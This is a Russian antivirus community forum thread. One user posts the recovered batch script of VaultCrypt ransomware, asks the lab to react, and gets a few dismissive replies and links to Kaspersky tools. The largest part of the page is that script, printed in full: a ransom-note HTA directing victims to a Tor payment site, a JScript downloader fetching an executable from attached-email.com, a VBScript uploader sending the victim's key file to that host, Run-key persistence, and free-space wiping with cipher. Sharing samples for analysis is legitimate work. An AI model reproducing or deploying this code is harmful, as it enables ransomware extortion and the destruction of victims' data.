echo ^</script^>^</head^>^<body scroll="no"^>^<div class="vaustyle"^>^<div class="sc"^>Ваши документы и базы данных были зашифрованы и помещены в^<br^>^☢^ ^<b^>формат .VAULT^</b^>^ ^☢^</div^>^<div class="sc" style="font-size:20px;width:800px;margin-left:200px;color:#EAEAEA;"^>Для их восстановления необходимо получить ^<b^>Ваш ключ^</b^>^</div^>^<br^>^<div class="briefly"^>^<div class="bti"^>^<b^>Кратко:^</b^>^</div^>^<div class="sced"^>Необходимо произвести 3 шага:^<hr^> ^➠ Зайдите на наш веб-ресурс^<br^> ^Ⓑ Получите свой ключ^<br^>^⤷ ^<b^>Восстановите файлы^</b^>^</div^>^</div^>^<div class="detailed"^>^<div class="bti"^>^<b^>Детально:^</b^>^</div^>^<div class="sced"^>Скачайте ^<b^>Tor^</b^> браузер с оф. сайта ^<form action="https://dist.torproject.org/torbrowser/4.0.5/torbrowser-install-4.0.5_ru.exe"^>^<inputclass="dbutt" type="submit" value="⇣ Загрузить"^>^</form^>^<form action="http://torproject.org/projects/torbrowser.html.en#windows"^>^<input class="dbutt" type="submit" value="Help" style="padding-bottom:1px;"^>^</form^>^<hr^>Зайдите на наш сайт ^<b^>используя Tor^</b^>:^<br^>^<div class="bti" style="margin:1px 8%%;padding:0px;cursor:text;"^>http://restoredz4xpmuqr.onion^</div^>^<form action="http://pastebin.com/rs7jZ0TW"^>^<input class="dbutt" type="submit" value="Не работает?"^>^ ^⤴^</form^>^<hr^>^<div class="fnl"^>Авторизируйтесь ^ ^➤^  ^<b^>Прочитайте отзывы^</b^> ^ ^➤^  Ключ^</div^>^</div^>^<div class="footer"^>^<b^>Note 1:^</b^> Вы не сможете восстановить файлы без уникального ключа.^</div^>^<div class="footer"^>^<b^>Note 2:^</b^> Перед авторизацией, Вы ^<u^>должны^</u^> найти Ваш ^<b^>VAULT.KEY^</b^> на компьютере.^</div^>^<div class="footer"^>^<b^>Note 3: Стоимость полного восстановления на ресурсе не окончательная^</div^>^</div^>^</body^>^</html^>>> "%temp%\aceb2c042b18bf38.hta"
copy /y "%temp%\aceb2c042b18bf38.hta" "%appdata%\aceb2c042b18bf38.hta"
del /f /q "%temp%\440b0b96.cmd"
attrib +h "%appdata%\aceb2c042b18bf38.hta"
attrib +r +s "%temp%\VAULT.KEY"
attrib +r +s "%appdata%\VAULT.KEY"
attrib +r +s "%userprofile%\Desktop\VAULT.KEY"
:72fde7d3
echo do_vbsUpload > "%temp%\6387669a.vbs"
echo Sub do_vbsUpload^(^) >> "%temp%\6387669a.vbs"
echo Dim FileName,DestURL,FieldName >> "%temp%\6387669a.vbs"
echo FieldName="FileField" >> "%temp%\6387669a.vbs"
echo Dim aCounter,Arg >> "%temp%\6387669a.vbs"
echo aCounter=1 >> "%temp%\6387669a.vbs"
echo For Each Arg In WScript.Arguments >> "%temp%\6387669a.vbs"
echo Select Case aCounter >> "%temp%\6387669a.vbs"
echo Case 1: FileName=Arg >> "%temp%\6387669a.vbs"
echo Case 2: DestURL=Arg >> "%temp%\6387669a.vbs"
echo Case 3: FieldName=Arg >> "%temp%\6387669a.vbs"
echo End Select >> "%temp%\6387669a.vbs"
echo aCounter=aCounter+1 >> "%temp%\6387669a.vbs"
echo Next >> "%temp%\6387669a.vbs"
echo UploadFile DestURL,FileName,FieldName >> "%temp%\6387669a.vbs"
echo End Sub >> "%temp%\6387669a.vbs"
echo Sub UploadFile^(DestURL,FileName,FieldName^) >> "%temp%\6387669a.vbs"
echo Const Boundary="---------------------------0123456789012" >> "%temp%\6387669a.vbs"
echo Dim FileContents,FormData >> "%temp%\6387669a.vbs"
echo FileContents=GetFile^(FileName^) >> "%temp%\6387669a.vbs"
echo FormData=BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\6387669a.vbs"
echo IEPostBinaryRequest DestURL,FormData,Boundary >> "%temp%\6387669a.vbs"
echo End Sub >> "%temp%\6387669a.vbs"
echo Function BuildFormData^(FileContents,Boundary,FileName,FieldName^) >> "%temp%\6387669a.vbs"
echo Dim FormData,Pre,Po >> "%temp%\6387669a.vbs"
echo Const ContentType="application/upload" >> "%temp%\6387669a.vbs"
echo Pre="--"+Boundary+vbCrLf+mpFields^(FieldName,FileName,ContentType^) >> "%temp%\6387669a.vbs"
echo Po=vbCrLf+"--"+Boundary+"--"+vbCrLf >> "%temp%\6387669a.vbs"
echo Const adLongVarBinary=205 >> "%temp%\6387669a.vbs"
echo Dim RS: Set RS=CreateObject^("ADODB.Recordset"^) >> "%temp%\6387669a.vbs"
echo RS.Fields.Append "b",adLongVarBinary,Len^(Pre^)+LenB^(FileContents^)+Len^(Po^) >> "%temp%\6387669a.vbs"
echo RS.Open >> "%temp%\6387669a.vbs"
echo RS.AddNew >> "%temp%\6387669a.vbs"
echo Dim LenData >> "%temp%\6387669a.vbs"
echo LenData=Len^(Pre^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(StringToMB^(Pre^) ^& ChrB^(0^)^) >> "%temp%\6387669a.vbs"
echo Pre=RS^("b"^).GetChunk^(LenData^) >> "%temp%\6387669a.vbs"
echo RS^("b"^)="" >> "%temp%\6387669a.vbs"
echo LenData=Len^(Po^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(StringToMB^(Po^) ^& ChrB^(0^)^) >> "%temp%\6387669a.vbs"
echo Po=RS^("b"^).GetChunk^(LenData^) >> "%temp%\6387669a.vbs"
echo RS^("b"^)="" >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(Pre^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(FileContents^) >> "%temp%\6387669a.vbs"
echo RS^("b"^).AppendChunk^(Po^) >> "%temp%\6387669a.vbs"
echo RS.Update >> "%temp%\6387669a.vbs"
echo FormData=RS^("b"^) >> "%temp%\6387669a.vbs"
echo RS.Close >> "%temp%\6387669a.vbs"
echo BuildFormData=FormData >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function IEPostBinaryRequest^(URL,FormData,Boundary^) >> "%temp%\6387669a.vbs"
echo Dim IE: Set IE=CreateObject^("InternetExplorer.Application"^) >> "%temp%\6387669a.vbs"
echo IE.Navigate URL,,,FormData,_ >> "%temp%\6387669a.vbs"
echo "Content-Type: multipart/form-data; boundary="+Boundary+vbCrLf >> "%temp%\6387669a.vbs"
echo do While IE.Busy >> "%temp%\6387669a.vbs"
echo Wait >> "%temp%\6387669a.vbs"
echo Loop >> "%temp%\6387669a.vbs"
echo On Error Resume Next >> "%temp%\6387669a.vbs"
echo IEPostBinaryRequest=IE.Document.body.innerHTML >> "%temp%\6387669a.vbs"
echo IE.Quit >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function mpFields^(FieldName,FileName,ContentType^) >> "%temp%\6387669a.vbs"
echo Dim MPtemplate >> "%temp%\6387669a.vbs"
echo MPtemplate="Content-Disposition: form-data; name=""{field}"";"+_ >> "%temp%\6387669a.vbs"
echo " filename=""{file}"""+vbCrLf+_ >> "%temp%\6387669a.vbs"
echo "Content-Type: {ct}"+vbCrLf+vbCrLf >> "%temp%\6387669a.vbs"
echo Dim Out >> "%temp%\6387669a.vbs"
echo Out=Replace^(MPtemplate,"{field}",FieldName^) >> "%temp%\6387669a.vbs"
echo Out=Replace^(Out,"{file}",FileName^) >> "%temp%\6387669a.vbs"
echo mpFields=Replace^(Out,"{ct}",ContentType^) >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function GetFile^(FileName^) >> "%temp%\6387669a.vbs"
echo Dim Stream: Set Stream=CreateObject^("ADODB.Stream"^) >> "%temp%\6387669a.vbs"
echo Stream.Type=1 >> "%temp%\6387669a.vbs"
echo Stream.Open >> "%temp%\6387669a.vbs"
echo Stream.LoadFromFile FileName >> "%temp%\6387669a.vbs"
echo GetFile=Stream.Read >> "%temp%\6387669a.vbs"
echo Stream.Close >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Function StringToMB^(S^) >> "%temp%\6387669a.vbs"
echo Dim I,B >> "%temp%\6387669a.vbs"
echo For I=1 To Len^(S^) >> "%temp%\6387669a.vbs"
echo B=B ^& ChrB^(Asc^(Mid^(S,I,1^)^)^) >> "%temp%\6387669a.vbs"
echo Next >> "%temp%\6387669a.vbs"
echo StringToMB=B >> "%temp%\6387669a.vbs"
echo End Function >> "%temp%\6387669a.vbs"
echo Sub Wait^(^) >> "%temp%\6387669a.vbs"
echo On Error Resume Next >> "%temp%\6387669a.vbs"
echo End Sub >> "%temp%\6387669a.vbs"
echo var fp="%%temp%%\\",os="attached-email",WshShell=CreateObject^("WScript.Shell"^),fp=WshShell.ExpandEnvironmentStrings^(fp^);function CreateObject^(b^){return new ActiveXObject^(b^)}function dw^(b,d^){var c=new ActiveXObject^("MSXML2.XMLHTTP"^);c.open^("GET",b,0^);c.send^(^);new ActiveXObject^("Scripting.FileSystemObject"^);var a=new ActiveXObject^("ADODB.Stream"^);a.Open^(^);a.Type=1;a.Write^(c.ResponseBody^);a.Position=0;a.SaveToFile^(d,2^);a.Close^(^)}dw^("http://"+os+".com/v.vlt",""+fp+"04442bd2.exe"^); > "%temp%\d690e171.js"
wscript.exe //B //Nologo //T:120 "%temp%\d690e171.js"
if exist 04442bd2.exe (
"%temp%\04442bd2.exe" -f "%temp%\e6355ca8.47b1ab0c"
wscript.exe //B //Nologo //T:120 "%temp%\6387669a.vbs" "%temp%\e6355ca8.47b1ab0c" http://attached-email.com/v.phppf
del /f /q 04442bd2.exe
)
del /f /q "%temp%\d690e171.js"
del /f /q "%temp%\6387669a.vbs"
del /f /q "%temp%\e6355ca8.47b1ab0c"
attrib -h -s "%temp%\f44cf952.46ea399a"
del /f /q "%temp%\f44cf952.46ea399a"
del /f /q "%temp%\*.gpg"
del /f /q "%temp%\*.*xe"
echo Y|assoc .vault=40e9cfd9
echo Y|ftype "40e9cfd9"=mshta.exe vbscript:Execute^(^"msgbox ^"^" BLOCKED:^"^"^&vbNewLine^&^"^" %%1^"^"^&vbNewLine^&vbNewLine^&ChrW^(10139^)^&^"^" KEY PURCHASE: http://restoredz4xpmuqr.onion^"^"^&vbNewLine^&vbNewLine^&^"^"[accessible only via Tor Browser: http://torproject.org]^"^",16,^"^"VaultCrypt [Need to purchase key]^"^":close^"^)
echo Y|assoc "40e9cfd9"\DefaultIcon=%SystemRoot%\System32\shell32.dll,-48
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "b276ebf8" /t REG_SZ /f /d "mshta %appdata%\aceb2c042b18bf38.hta"
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "f4e4bf4e" /f
del /f /q "%temp%\fabac41c.js"
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "4323ae20" /f
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "5dd61003" /f
start mshta "%temp%\aceb2c042b18bf38.hta"
attrib -s -h "%temp%\f44cf952.46ea399a"
del /f /q "%temp%\f44cf952.46ea399a"
if exist "%systemroot%\system32\cipher.exe" (
FOR %%s IN (A B C D E F G H I J K L M N O P Q R S T U V W X Y Z) DO call :ef60c46d %%s
goto c43a2b20
:ef60c46d
cipher /w:%1:
goto:eof
:c43a2b20
echo 85ceb2b1
)
del /f /q %0
:85ceb2b1
 

 

 

 
на клиенте....то бишь ключ
не идет из инета...

%temp%\sv.css" svchost.exe является свободной утилитой pgp

Ссылка на комментарий
Поделиться на другие сайты
billandrew Новичок

billandrew

Опубликовано
  • Автор
Опубликовано (изменено)

еще выложить файлы bat  и vbs полученные из данного вируса?

 

настораживает поздняя реакция лаборатории на последние угрозы


понял... лаборатории не интересно....

 

P.S. Дополнение .... все файлы получены методом простого запрета удалять фалы из профайла пользователя... после работы виря...

 

А чем занимается фан-клуб? Самосозерцанием? Или любованием продукта?

Изменено пользователем billandrew
  • Нет слов 2
Ссылка на комментарий
Поделиться на другие сайты
Friend Корифей

Friend

Опубликовано
Опубликовано (изменено)

@billandrew,  по вашей теме: https://twitter.com/e_kaspersky_ru/status/586072594886991872  ?

Уже есть KES 10: http://support.kaspersky.ru/kes10wks

Есть вот такая занимательная статья: http://support.kaspersky.ru/10905и вот такие рекомендации http://support.kaspersky.ru/10952

Чем вы занимаетесь на работе? Давно должны быть в теме какие угрозы сейчас  популярны.

Изменено пользователем Friend
Ссылка на комментарий
Поделиться на другие сайты
gecsagen Профи

gecsagen

Опубликовано
Опубликовано

Да и мы тут в большинстве своем "простые смертные" и подобных проблем не решаем.В вирлабе может давно все сделали,а Вы панику разводите.Есть у ЛК спец утилиты для расшифровки туда в базы добавляют.И такие продукты ЛК как KIS не любят пропускать шифровальщиков.Да и в windows 7/8 хорошие настройки безопасности.

Даже если вирлаб не реагирует-значит считает это нужным.

Ссылка на комментарий
Поделиться на другие сайты

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Share
Перейти к списку тем

  • Похожий контент

    • DIMANDUC
      Какая погода в вашей местности?
      От DIMANDUC
      В общем, пришла весна, и зима по-тихоньку отступает. В кратце опишу, какая погода в нашем городе Ардатове:
       
      Солнце светит, правда иногда за тучи заходит. Недавно прошел снег, где-то сантиметров 10 насыпало. А так, ночью мороз, а утром гололед. Начиная приблизительно с 10 часов утра и до вечера снег повсюду начинает таять, становится липким. Вечером подмораживает опять. И так практически каждый день.
    • wwewww
      Помощь в устранение ошибки "Некоторыми параметрами управляет ваша организация"
      От wwewww
      После удаления вируса(chronium:page.malware.url) осталась надпись Некоторыми параметрами управляет ваша организация. Пытался переустановить винду, выдает ошибку. Так-же пытался вернуть компьютер в исходное состояние, тоже отменяется. 


    • Алексей1977
      Шифровальщик, дал расширение ELPACO-team. Найден вирус HEUR:Trojan-Ransom.Win32.Mimic.gen
      От Алексей1977
      Добрый день! В принципе в заголовке все описал. Хотел поинтересоваться, был ли у кого положительный опыт в расшифровке этих файлов?
    • KL FC Bot
      Многослойная защита Kaspersky для ваших онлайн-финансов | Блог Касперского
      От KL FC Bot
      Уже давно значительная часть наших финансов существует не в физическом, а в цифровом виде. Банковские приложения, цифровые кошельки, онлайн-платежи и криптовалюты — все эти достижения XXI века делают финансовые операции более быстрыми, удобными и доступными и дают нам массу новых возможностей, которые раньше просто невозможно было представить.
      Но у этого комфорта есть и обратная сторона: наши цифровые финансы становятся уязвимы для цифровых же преступлений. Впрочем, это справедливо только в том случае, если не заботиться о защите своих онлайн-финансов от киберпреступников. В этом посте мы рассмотрим, как технологии и продукты Kaspersky помогают обеспечить безопасность цифровых денег, которые теперь находятся в центре нашего финансового благополучия.
      1. Менеджер паролей
      Основа защиты любых онлайн-аккаунтов, и финансовые сервисы тут совсем не исключение, — это, конечно же, пароли. Если вы используете слабый пароль, то шанс успешного взлома вашей учетной записи в платежной системе или интернет-магазине, в котором вы вводили номер вашей карточки, существенно повышается.
      Не менее опасно использовать один и тот же пароль в разных онлайн-сервисах. Если вы так делаете, то в случае утечки паролей на одном из ресурсов — что, увы, совсем не редкость — опасности подвергаются ваши аккаунты и в других сервисах. Дело в том, что взломщики прекрасно знают о том, что многие люди используют одни и те же комбинации символов, поэтому часто используют утекшие пароли для входа на другие ресурсы — эта атака называется подстановка учетных данных (credential stuffing). И в первую очередь злоумышленников интересуют как раз те сервисы, которые так или иначе связаны с деньгами.
      Радикально улучшить ситуацию с паролями в ваших финансовых аккаунтах поможет Kaspersky Password Manager. Наше приложение сгенерирует уникальные и максимально надежные пароли для каждого используемого вами сервиса, безопасно их сохранит, чтобы вам не пришлось их запоминать, и даже предупредит об утечках. Кстати, в последнем обновлении нашего менеджера паролей появилась еще и возможность генерировать одноразовые коды для двухфакторной аутентификации. А с подписками Kaspersky Plus и Kaspersky Premium вы получите его бесплатно.
       
      Посмотреть статью полностью
    • KL FC Bot
      Автомобили — злейшие нарушители вашей приватности. Как защититься? | Блог Касперского
      От KL FC Bot
      Угадайте с трех раз, что из вашего имущества активнее всего собирает персональную информацию для анализа и перепродажи?
      Это автомобиль. По словам специалистов из Mozilla Foundation, с ним не могут сравниться ни смарт-часы, ни умные колонки, ни камеры видеонаблюдения, ни прочие гаджеты, проанализированные ранее проектом Privacy Not Included. В рамках этого проекта эксперты изучают пользовательские соглашения и политики конфиденциальности, чтобы понять, как устройство использует персональные данные владельца.
      Так вот, впервые в истории проекта абсолютно все (25 из 25) проверенные бренды автомобилей получили «красную карточку» за неприемлемо широкий сбор персональной информации, непрозрачность ее использования, плохо документированные практики передачи и хранения данных (например, неизвестно, используется ли при этом шифрование) и возможность перепродажи собранной информации, о чем официально заявили 19 из 25 брендов. Вишенка на торте — практически полная невозможность автовладельца отказаться от сбора и передачи этих данных: лишь два бренда — Renault и Dacia — предоставляют владельцам право удалить собранные персональные данные. Правда, до такой возможности нужно еще додуматься.
      Глубоко в недрах лицензионных соглашений, которые покупатели автомобилей принимают обычно «по умолчанию», не читая, зарыты совершенно дикие нарушения права на конфиденциальность: например, согласие владельца поделиться своими сексуальными предпочтениями и генетической информацией (Nissan), раскрытие информации по неформальным запросам правоохранительных органов (Hyundai), сбор данных об уровне стресса — и все это в довесок к еще 160 категориям данных, названных нарочито расплывчато, например «демографические сведения», «изображения», «платежная информация», «геолокация» и так далее.
      Антирекордсменом рейтинга стала Tesla, получившая, в дополнение к остальным возможным штрафным баллам, специальную отметку: «Не заслуживающий доверия искусственный интеллект (ИИ)».
      Как автомобили собирают информацию
      Современный автомобиль буквально напичкан датчиками — начиная с сенсоров в двигателе и ходовой, показывающих, например, температуру двигателя, угол поворота руля или давление в шинах, и заканчивая куда более интересными, такими как видеокамеры по периметру машины и в салоне, микрофоны, датчики присутствия рук на руле…
      Все они объединены в общую шину, поэтому головной компьютер автомобиля получает всю эту информацию централизованно. Плюс все современные автомобили оснащены GPS, модулем сотовой связи, Bluetooth и Wi-Fi. Наличие сотовой связи и GPS во многих странах продиктовано законом (для автоматического вызова помощи при ДТП), но производители охотно используют эту функцию для удобства водителя — и своего. Можно прокладывать маршрут на экране автомобиля, дистанционно диагностировать поломки, заблаговременно заводить машину… И, конечно, мостик «датчики и камеры → компьютер автомобиля → сотовая сеть» создает постоянный канал сбора информации: куда вы едете, где и сколько времени стоите на парковке, насколько резко крутите руль и газуете, пользуетесь ли ремнями безопасности и так далее.
       
      Посмотреть статью полностью
×
×
  • Создать...